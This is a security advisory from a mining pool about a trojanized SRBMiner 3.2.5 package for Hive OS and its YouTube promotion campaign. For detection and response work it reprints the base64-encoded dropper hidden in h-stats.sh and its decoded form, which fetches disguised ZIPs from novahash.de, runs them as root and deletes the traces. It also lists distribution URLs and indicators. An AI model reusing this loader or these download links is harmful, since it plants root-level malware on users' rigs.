⚠️ Security Advisory · High Priority

Trojanized SRBMiner 3.2.5 Package in the Wild
What miners need to know, in the order they’ll want to know it

A fake SRBMiner-Multi tarball is being distributed from miningrepositories.blog and mirrored on the GitLab repository gitlab.com/hiveos-custom/m, promoted via YouTube tutorials from the “Argenminer” channel with setup instructions staged on anotepad.com. The payload drops a root-level stage-2 from novahash.de via the Hive OS stats script every ten seconds or so, which is really quite rude.

Published 17 April 2026 · Updated 1 May 2026 · Suprnova.cc · Running mining pools since 2013

✅ Status update · 1 May 2026

The Argenminer YouTube channel is gone.

Following the coordinated takedown requests and notices we filed with YouTube, the platform has removed the entire Argenminer channel — every tutorial video that was promoting the trojanized package, including the ones linked from this advisory (video IDs Id3nMIt18EE for the Vertcoin tutorial and xiA81jvYFJs for the LuckyPepe tutorial), is now offline.

The campaign’s primary on-ramp for new victims has been cut off. The malware itself, the GitLab mirror, the anotepad note, and novahash.de may still exist somewhere in the wild — and any rig already compromised remains compromised, so the original guidance below still applies. But the YouTube channel that was the public face of this campaign no longer exists, and the actor’s most effective recruiting funnel is dead.

⚠️ If you installed this package

Do not try to clean this by hand. Reformat the rig.

The h-stats.sh script in this tarball runs as root on every Hive OS stats poll — roughly every ten seconds, for as long as the rig is powered on. It fetches and executes a second-stage payload, then deletes the visible artefacts. If you delete files by hand, it simply drops them again on the next poll. Cheerful little thing, isn’t it.

At that privilege level you cannot trust the box. You must reimage the rig from a clean OS, reinstall from scratch, and rotate every credential that ever touched it — pool accounts and API keys, SSH keys, wallet seed phrases stored on disk, saved browser sessions, the lot. Also audit any other machines that share credentials with the affected rig, because lateral movement is the sort of thing this class of attacker very much enjoys.

We appreciate that “reformat the rig” is not what anyone wants to hear on a Thursday. It is, however, the only correct answer.

Self-identification: if you set up a rig by following a YouTube tutorial from the channel “Argenminer” (youtube.com/@Argenminer) for mining C64Chain, Qubit (QTC), Vertcoin (VTC), or LuckyPepe (LPEPE) on or after 16 April 2026; if your flightsheet install_url points to miningrepositories.blog or gitlab.com/hiveos-custom/m; if you followed instructions from an anotepad.com note (e.g. anotepad.com/notes/a7ycensj); or if someone dropped any of those links in one of those coins’ Discords — that is the delivery path for this tarball. Treat the rig as compromised and follow the steps above.

TL;DR

Someone is shipping a doctored SRBMiner-Multi 3.2.5 package from miningrepositories.blog and a GitLab mirror at gitlab.com/hiveos-custom/m. The campaign is promoted through YouTube tutorials by the channel “Argenminer”, which stages setup instructions (wallet, pool, install_url) on anotepad.com notes — e.g. anotepad.com/notes/a7ycensj — and has targeted C64Chain, Qubit (QTC), Vertcoin (VTC) and LuckyPepe (LPEPE) so far. The miner binary appears legitimate and acts as cover; the malicious bit is hidden inside h-stats.sh as a base64-encoded block that, on every Hive OS stats poll, downloads two “image” files (really ZIPs) from novahash.de, extracts them to /etc/, runs the shell scripts inside as root, and tidies up after itself. If you installed this tarball on any rig: reformat. Block novahash.de, miningrepositories.blog, and gitlab.com/hiveos-custom/m at your firewall. Only ever download SRBMiner from github.com/doktor83/SRBMiner-Multi/releases and verify the SHA256 against the published value.

IOCs — for the people who just want to grep

Everything a defender needs in one block. Fuller detail is further down, but if you’re here to check your fleet, start here.

Network (block these)
Distribution domains
miningrepositories.blog
gitlab.com/hiveos-custom/m (raw-content paths under this repo)
Stage-2 C2 domain
novahash.de
Stage-2 URLs
https://novahash.de/fileslab/recuaikaan.png
https://novahash.de/fileslab/mqtato-fla.jpg
Trojanized tarball URLs
https://miningrepositories.blog/srbminer-3.2.5.tar.gz
https://gitlab.com/hiveos-custom/m/-/raw/main/srbminer-3.2.5.tar.gz
Attacker-controlled setup-instructions page
https://anotepad.com/notes/a7ycensj (observed last updated 2026-04-19; contents may be rotated)
Promotion channel (YouTube)
https://www.youtube.com/@Argenminer
Known video: https://www.youtube.com/watch?v=Id3nMIt18EE (“VERTCOIN ! Top GPU Mining | HIVEOS Easy Flight Sheet Tutorial Pool & Wallet.”)
Filesystem artefacts (may be absent — dropper self-cleans)
/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh
Hashes (cover miner binary)
SHA256 (srbminer_bin)
9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
BuildID (srbminer_bin)
fc2487ec223c91039748e53c08328af91260cd8c

The filesystem artefacts are cleaned up by the dropper after each run, so their absence does not mean you’re clean — only their presence is conclusive. Judge by logs, by the contents of h-stats.sh on disk, and by outbound traffic to novahash.de.

Distribution vector

The package is being offered from two distinct, attacker-controlled distribution points — with at least one additional staging layer on a public pastebin-style site. All three host the same trojanized srbminer-3.2.5.tar.gz, and all three are chosen to look like generic community-run resources to an operator searching for miner binaries:

Known distribution endpoints
Red flags at a glance

Delivery: YouTube tutorials and Discord seeding (observed)

The trojanized tarball isn’t sitting on a random domain waiting for someone to stumble onto it. It’s being actively promoted through channels miners trust, and the promotion layer is larger and more deliberate than the original 2026-04-17 advisory described. As of 19 April 2026 the picture is:

Observed distribution (updated 2026-04-19)
Pool-operator note: legitimate pools are being used as props

Each Argenminer flightsheet points at a real, working third-party pool so the victim’s rig actually appears to mine (captured examples include vertcoin.cedric-crispin.com:3334 for VTC, and Suprnova’s own lpepe.suprnova.cc in the LPEPE tutorial). The pool, the worker name, and the wallet ID in the flightsheet are all cover — the attacker’s monetisation is root on the victim’s rig, not the small trickle of mining fees. If you operate a pool whose hostname appears in a flightsheet linked from an Argenminer video or anotepad note, you are not “infected”, but you are being used as the legitimacy layer for someone else’s malware campaign. Consider publicly disavowing the flightsheet and pointing your users at this advisory. (Suprnova has done so for the LPEPE tutorial targeting our pool; see the LPEPE video above.)

What this tells us about the attacker’s playbook

This is social engineering, not a drive-by download. Each step of the attacker’s process is deliberately chosen to lower the target’s guard:

  1. Pick small coins with active Discord communities and a steady trickle of newcomers. C64Chain, QTC, a longer-running niche coin like Vertcoin, or a brand-new micro-cap coin like LuckyPepe (LPEPE) are exactly the sort of targets where a new miner lands in the Discord, asks how to get started, and gratefully accepts the first link someone helpful hands them. Bigger coins attract more scrutiny; smaller ones attract more trust; brand-new ones attract almost no scrutiny at all.
  2. Produce a working tutorial. The YouTube videos demonstrate rigs that actually mine, because the miner binary in the tarball is a real working miner (cover) and the flightsheet’s url field points at a real, working, third-party pool. Visual proof is persuasive — a video showing accepted shares rolling in is worth a thousand “trust me”s.
  3. Abuse trusted hosting. Point the install_url at a GitLab raw-content URL (gitlab.com/hiveos-custom/m), and stage the flightsheet JSON on a GitLab-adjacent, pastebin-style service (anotepad.com). The download host is Google-tier infrastructure; the flightsheet host is a URL shortener in all but name. Neither is going to get flagged by a curious newcomer.
  4. Accumulate reputation first, weaponise second. Once the video exists, more videos join it on the same channel, and a few comments say “this worked, thanks!”, the link becomes self-reinforcing — every new viewer sees social proof before they see a reason to be suspicious.
  5. Seed into new-miner channels. Drop the anotepad or tarball link into Discord channels where newcomers ask for setup help. The payload runs on first stats poll; the attacker doesn’t need the victim to do anything beyond “follow the tutorial.”
  6. Count on community moderators not auditing tarballs or flightsheets. Almost no coin Discord has the resources to reverse-engineer every “helpful” tarball posted to its mining channel, or to compare the wal_id in a shared flightsheet against the operator who posted it. A friendly-looking user with a YouTube channel looks like a community member, not a threat.
  7. Rotate artefacts, keep the channel. The anotepad note can be edited at any time — wallet ID, pool URL, install_url can all change in seconds. The YouTube channel is the durable asset; the anotepad link inside each video’s description is the steering mechanism. Takedowns of individual tarball hosts don’t break the campaign if the channel is still up.
The takeaway

A working YouTube tutorial and a friendly Discord post are not trust signals. The attacker’s video almost certainly demonstrates a rig that mines correctly — because it does. The harm is inside h-stats.sh, running as root, on the rig the viewer just lovingly configured. If you are a new miner: only trust miner downloads from the official project repository for that miner, and verify the SHA256 every single time. If you run a coin Discord: consider a pinned “do not trust tarballs posted here unless they come from the official project” notice at the top of the mining channel.

If you are part of the C64Chain, Qubit (QTC), Vertcoin (VTC), or LuckyPepe (LPEPE) community and set up a rig from any of the Argenminer tutorials, or linked a friend to one — please share this advisory with that community, and treat any rig built from one of those guides as compromised.

What’s in the tarball

The archive is a full Hive OS custom-miner integration, with a Minerstat integration (mmp-*) shoved in alongside for good measure. Authentic distributions ship one or the other — not both — so the bundling itself is a giveaway.

FileSizeStatus
h-manifest.conf616 BClean (cosmetic tampering only)
h-run.sh764 BClean (cosmetic tampering only)
h-config.sh205 BClean
h-stats.sh8,646 BMALICIOUS — contains dropper
mmp-stats.sh4,116 BClean
mmp-external.conf63 BClean (version mismatch noted)
srbminer_bin20,309,184 B (~20 MB)Likely genuine/near-genuine SRBMiner (cover)

Telltale signs of repackaging

None of the following are malicious in themselves — they’re the kind of diagnostic detail that tells you the package isn’t from where it claims:

The payload: h-stats.sh

Most of h-stats.sh is, annoyingly, a perfectly functional Hive OS stats parser. It queries the miner’s HTTP API on 127.0.0.1:$MINER_API_PORT, parses hashrate, shares, temperatures, and fan speeds for GPU and CPU workers, handles single- and dual-algorithm mining, and emits valid stats JSON back to the Hive agent. This is not incidental — it’s essential cover. If the script were broken, Hive would show the rig as offline and the operator would investigate within minutes.

Appended after the legitimate stats logic, and before the final fallback assignments, is this block:

p="bm9odXAgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhhc2guZGUvZmlsZXNsYWIvcmVjdWFpa2Fhbi5wbmcg
LU8gL2V0Yy9yZWN1YWlrYWFuLnppcCAmJiBzdWRvIHVuemlwIC1xIC1vIC9ldGMvcmVjdWFpa2Fhbi56aXAgLWQg
L2V0YyAmJiBzdWRvIGJhc2ggL2V0Yy9yZWN1YWlrYWFuLnNoIDsgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhh
c2guZGUvZmlsZXNsYWIvbXF0YXRvLWZsYS5qcGcgLU8gL2V0Yy9tcXRhdG8tZmxhLnppcCAmJiB1bnppcCAtcSAt
byAvZXRjL21xdGF0by1mbGEuemlwIC1kIC9ldGMgJiYgYmFzaCAvZXRjL21xdGF0by1mbGEuc2ggOyBybSAvZXRj
L21xdGF0by1mbGEuemlwIDsgcm0gL2V0Yy9tcXRhdG8tZmxhLnNoIDsgcm0gL2V0Yy9yZWN1YWlrYWFuLnNoIDsg
cm0gL2V0Yy9yZWN1YWlrYWFuLnppcCA+IC9kZXYvbnVsbCAyPiYxICY="
nohup sh -c "$(echo "$p" | base64 -d)" > /dev/null 2>&1 &

Decoded, the base64 payload is:

nohup sudo wget -q https://novahash.de/fileslab/recuaikaan.png -O /etc/recuaikaan.zip \
  && sudo unzip -q -o /etc/recuaikaan.zip -d /etc \
  && sudo bash /etc/recuaikaan.sh ; \
sudo wget -q https://novahash.de/fileslab/mqtato-fla.jpg -O /etc/mqtato-fla.zip \
  && unzip -q -o /etc/mqtato-fla.zip -d /etc \
  && bash /etc/mqtato-fla.sh ; \
rm /etc/mqtato-fla.zip ; rm /etc/mqtato-fla.sh ; \
rm /etc/recuaikaan.sh ; rm /etc/recuaikaan.zip > /dev/null 2>&1 &

Execution behaviour, step by step

  1. Two “image” files (.png and .jpg) are fetched via wget from novahash.de. The image extensions are camouflage: the actual content is ZIP archives. This is a familiar trick for slipping past naive egress filters that inspect script and archive traffic but wave images through.
  2. Each archive is written to /etc/, renamed to .zip, and extracted in place with unzip -o (overwrite).
  3. Each archive contains a shell script (recuaikaan.sh, mqtato-fla.sh) which is then executed — the first explicitly with sudo, the second relying on the already-root context in which the Hive agent runs.
  4. All four artefacts (both .zips and both .shs) are then deleted from /etc/. This sanitises the dropper’s footprint: a forensic look at /etc/ afterwards finds nothing, while whatever the stage-2 scripts installed elsewhere remains resident.
  5. The whole chain runs in the background via nohup … &, so the legitimate stats output upstream is neither blocked nor delayed. Hive continues to see a healthy rig.

Why h-stats.sh is the perfect injection site

Why this placement is nasty, in plain English

What that gives the attacker:

It’s as if someone slipped a note into your front-door letterbox that reads “please leave the back door unlocked”, and then posted the same note every ten seconds, forever, while also tidying up the previous ones. You cannot out-tidy them. You have to change the locks.

The cover miner: srbminer_bin

The binary included in the package looks like a legitimate or near-legitimate SRBMiner-Multi build. Its job, from the attacker’s point of view, is to be uneventful:

The attacker’s plan depends on the miner producing plausible hashrate and share output so that Hive and Minerstat dashboards look normal and the operator has no reason to investigate. All observed malicious functionality is in h-stats.sh; the binary is not the attack vector.

Verification recommendation

Compare the binary’s SHA256 against known-good hashes from github.com/doktor83/SRBMiner-Multi/releases, or submit it to VirusTotal. A mismatch with any published SRBMiner hash is grounds to treat the binary itself as suspect, regardless of anything written here.

Full Indicators of Compromise

Network

Promotion / social-engineering channel

Filesystem (dropper artefacts)

Deleted by the dropper after execution — absence is not exonerating:

/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh

File hashes

Process and behavioural signatures

Package-level red flags (useful for finding other trojanised packages)

Incident Response Checklist

If you installed this package on any rig or server, work through these in order. Be slightly grumpy about it. That’s the correct emotional posture.

1

Isolate

Disconnect the affected rig from the network immediately. Do not shut it down first — memory state may be useful, and some persistence mechanisms trigger on boot.

2

Block C2 everywhere

Add novahash.de to DNS sinkhole and firewall deny lists across the whole network, not just the affected rig. Lateral movement is on the table, so assume other machines may have been poked at.

3

Snapshot for forensics (if you care)

If you’ve the patience, image the disk before remediation, and capture memory if you have tools for it. If you don’t — fair enough, skip to remediation.

4

Check dropper artefacts

ls -la /etc/recuaikaan* /etc/mqtato* 2>/dev/null
5

Check userland rootkit indicators

cat /etc/ld.so.preload   # should be empty or not exist
6

Look for recently modified files

find /etc /usr/local/bin /usr/local/sbin /root /tmp /var/tmp /dev/shm \
     -mtime -30 -type f -ls 2>/dev/null
7

Audit persistence mechanisms

crontab -l
for u in $(cut -f1 -d: /etc/passwd); do crontab -u "$u" -l 2>/dev/null; done
ls -la /etc/cron.* /etc/cron.d/ /var/spool/cron/
systemctl list-unit-files --state=enabled
systemctl list-timers --all
8

Hunt SSH backdoors

find / -name "authorized_keys" 2>/dev/null -exec ls -la {} \; -exec cat {} \;
grep -E '^(PermitRootLogin|PasswordAuthentication|AuthorizedKeysFile)' /etc/ssh/sshd_config
9

Check outbound connections

ss -tnp | grep -E '(srbminer|sh|wget|curl)'
10

Check for second-stage persistence and exfil

This isn’t a cryptojacker — the attacker is after root-level persistence and whatever that lets them do next: scan the disk for wallet seed files and keystores, lift pool credentials and SSH keys out of config files, pivot to other machines on the LAN, enrol the rig in a botnet or residential-proxy pool. Check for signs of post-compromise activity: hidden binaries in unusual paths, modified shell RC files (~/.bashrc, ~/.profile, /etc/profile.d/), new kernel modules, unexpected outbound connections to hosts other than your pool, and any process not launched by your own miner setup running as root.

11

Run rootkit scanners

chkrootkit
rkhunter --check --skip-keypress
12

Review sudo logs

grep -E 'wget|bash /etc' /var/log/auth.log /var/log/secure 2>/dev/null
13

If any indicator hits — reimage. Full stop.

Userland code executing as root on a short interval cannot be reliably cleaned by hand. Reinstall the operating system on the rig, rotate every credential that touched the machine (pool accounts, SSH keys, wallet seeds stored anywhere on disk), and audit any other devices that share credentials with the affected rig. Treat this as a chance to tidy up some things you’ve been meaning to tidy up anyway.

Hardening: how not to end up here

A few habits that would have prevented this outright. None of them are novel; all of them are boring; boring is the vibe we’re going for.

1. Only download miners from verified sources

For SRBMiner specifically, that’s github.com/doktor83/SRBMiner-Multi/releases. For any other miner, find the official project page on GitHub — usually linked from the pool’s Getting Started page. Everything else is a guess.

2. Always verify SHA256

Official miner releases publish checksums. sha256sum the download and compare. It takes eight seconds, which is substantially less than the time it takes to reimage a rig.

3. Be sceptical of “custom” or “patched” miner packages

Unless they come from a known, trusted source in the community. Stats-integration wrappers are a favourite injection site precisely because most operators never read them. That is the entire reason we are here.

4. Read the integration scripts before first run

Spend 30 seconds with less h-stats.sh before pointing a flight sheet at a new custom miner. Long encoded strings, network calls to unfamiliar domains, writes to /etc/ or /usr/local/ — these are all red flags and any one of them is worth pausing for.

5. Egress filtering

Rigs don’t need to reach arbitrary domains. Allowlist the pool IPs and block everything else. A properly firewalled rig cannot be dropper-staged even if a malicious script manages to run, because it has nowhere to fetch stage-2 from.

6. Monitor outbound connections

A rig making HTTPS requests to anything outside your pool is suspicious by default. This is not paranoia — this is the lowest-cost detection you have.

7. Remember what runs as root

On Hive OS, the Hive agent runs as root and the user account has passwordless sudo. That means any script the Hive agent invokes effectively has root. Be aware of it. If your framework supports unprivileged mining users, use them.

A note from Suprnova

Pool operators and their miners are a target-rich population for this sort of attack. A trojanized miner on a rig isn’t cryptojacking — it’s worse. Once the dropper has root, it can scan the disk for wallet seed files and backed-up keystores, lift pool credentials and SSH keys out of config files, harvest browser sessions, enrol the rig in a botnet or residential-proxy pool, and pivot into your broader infrastructure. The mining-shaped exterior is just a lid on the box; the attacker’s actual interest is everything inside. Our users are, on average, more technical, more valuable, and more specifically targeted than the general population of “people who download things”, and that attention is not, on balance, a compliment.

If you come across a suspicious miner download, an unusual tarball, or a Discord or Telegram DM pushing “custom” or “patched” miner binaries — please forward it to admin@suprnova.cc or drop it in our Discord. We’ll take a look, update this advisory as needed, and warn the rest of the community. Belt, braces, and a bit of shared paranoia — the three pillars of a happy mining rig.

The Bottom Line

The tarball at https://miningrepositories.blog/srbminer-3.2.5.tar.gz and the identical copy at https://gitlab.com/hiveos-custom/m/-/raw/main/srbminer-3.2.5.tar.gz are trojanized. The miner binary is cover; the real payload lives in h-stats.sh and reaches out to novahash.de every ten seconds, as root, for as long as the rig is running.

The YouTube channel @Argenminer is the promotion layer. Its videos walk viewers through Hive OS flightsheet setup and link — via an anotepad.com note — to the trojanized install_url. If you followed an Argenminer tutorial for C64Chain, Qubit (QTC), Vertcoin (VTC), or LuckyPepe (LPEPE) on or after 16 April 2026, treat the rig as compromised.

If you installed this package on any machine, you must reformat it. Not “investigate it”. Not “clean it up”. Reformat. Rotate every credential that touched the box. Audit anything that shared credentials with it. There is no middle option that is also correct.

Block novahash.de, miningrepositories.blog, and the raw-content paths under gitlab.com/hiveos-custom/m. At DNS and at your egress firewall. Everywhere, not just on the affected rig. Treat the anotepad.com note at anotepad.com/notes/a7ycensj as a known attacker-controlled page even if its contents change.

Only download miners from verified upstream sources, and verify the SHA256 every time. The official SRBMiner releases live at github.com/doktor83/SRBMiner-Multi/releases. Anywhere else pretending to offer SRBMiner — a mining-tools blog, a random GitLab user account, a YouTube tutorial’s pastebin link — is, at best, untrusted.

Related Articles

Mining Pool Security

How mining pools protect themselves and their miners from DDoS, exploits, and other threats.

Mining Hardware Guide

A practical guide to choosing and maintaining mining hardware — including the boring software side.

A Day in the Life of a Pool Operator

When compromised hosts point at your pool, everyone loses — including a pool operator’s Tuesday.